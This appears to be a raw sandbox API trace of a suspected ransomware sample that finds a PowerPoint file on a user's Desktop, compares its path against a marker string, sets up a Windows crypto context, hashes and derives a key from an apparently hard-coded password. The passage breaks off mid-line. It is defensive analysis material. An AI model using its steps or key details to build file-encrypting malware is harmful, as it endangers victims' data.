[0162.010] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0162.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0162.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0162.010] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0162.010] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0162.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0162.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0162.010] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0162.010] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.010] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.010] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.010] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.010] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0162.010] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4607d630, ftCreationTime.dwHighDateTime=0x1d5e111, ftLastAccessTime.dwLowDateTime=0x3db91a60, ftLastAccessTime.dwHighDateTime=0x1d5dcda, ftLastWriteTime.dwLowDateTime=0x3db91a60, ftLastWriteTime.dwHighDateTime=0x1d5dcda, nFileSizeHigh=0x0, nFileSizeLow=0x7a52, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="J-Lwl.pptx", cAlternateFileName="J-LWL~1.PPT")) returned 0x90add8 [0162.012] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0162.012] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4607d630, ftCreationTime.dwHighDateTime=0x1d5e111, ftLastAccessTime.dwLowDateTime=0x3db91a60, ftLastAccessTime.dwHighDateTime=0x1d5dcda, ftLastWriteTime.dwLowDateTime=0x3db91a60, ftLastWriteTime.dwHighDateTime=0x1d5dcda, nFileSizeHigh=0x0, nFileSizeLow=0x7a52, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="J-Lwl.pptx", cAlternateFileName="J-LWL~1.PPT")) returned 0x90add8 [0162.012] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0162.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Lwl.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.014] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0162.014] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0162.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0162.014] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4607d630, ftCreationTime.dwHighDateTime=0x1d5e111, ftLastAccessTime.dwLowDateTime=0x3db91a60, ftLastAccessTime.dwHighDateTime=0x1d5dcda, ftLastWriteTime.dwLowDateTime=0x3db91a60, ftLastWriteTime.dwHighDateTime=0x1d5dcda, nFileSizeHigh=0x0, nFileSizeLow=0x7a52, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="J-Lwl.pptx", cAlternateFileName="J-LWL~1.PPT")) returned 0x90ae18 [0162.014] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0162.014] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0162.014] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.014] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0162.014] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0162.014] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.014] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0162.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0162.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0162.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0162.015] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0162.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0162.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0162.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0162.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0162.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0162.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0162.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0162.016] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0162.016] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0162.016] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0162.032] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0162.032] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.032] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0162.033] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.033] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0162.033] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0162.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0162.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0162.033] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0162.033] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0162.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0162.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0162.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0162.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0162.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0162.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0162.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0162.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0162.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0162.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0162.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0162.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0162.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0162.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x8df050, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XNGnHuBtZMP7Oc4UntiQCY9VF", lpUsedDefaultChar=0x0) returned 26 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df050 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.034] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.035] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0162.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0162.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0162.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0162.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0162.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0162.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0162.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0162.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 